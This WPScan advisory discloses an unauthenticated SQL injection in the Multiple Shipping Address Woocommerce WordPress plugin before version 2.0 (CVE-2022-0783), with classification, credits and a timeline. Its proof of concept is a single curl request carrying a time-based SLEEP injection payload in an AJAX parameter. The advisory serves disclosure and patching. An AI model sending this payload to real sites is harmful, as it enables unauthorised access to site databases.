WordPress Plugin Vulnerabilities

Multiple Shipping Address Woocommerce < 2.0 - Unauthenticated SQLi

Description

The plugin does not properly sanitise and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=ocwma_choice_address&sid=3+AND+(SELECT+1946+FROM+(SELECT(SLEEP(5)))zsme)'

Affects Plugins

multiple-shipping-address-woocommerce

Fixed in version 2.0

References

CVE

CVE-2022-0783

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com

Submitter twitter

cyllective

Verified

Yes

WPVDB ID

4d594424-8048-482d-b61c-45be1e97a8ba

Timeline

Publicly Published

2022-04-11 (about 2 months ago)

Added

2022-04-11 (about 2 months ago)

Last Updated

2022-04-13 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin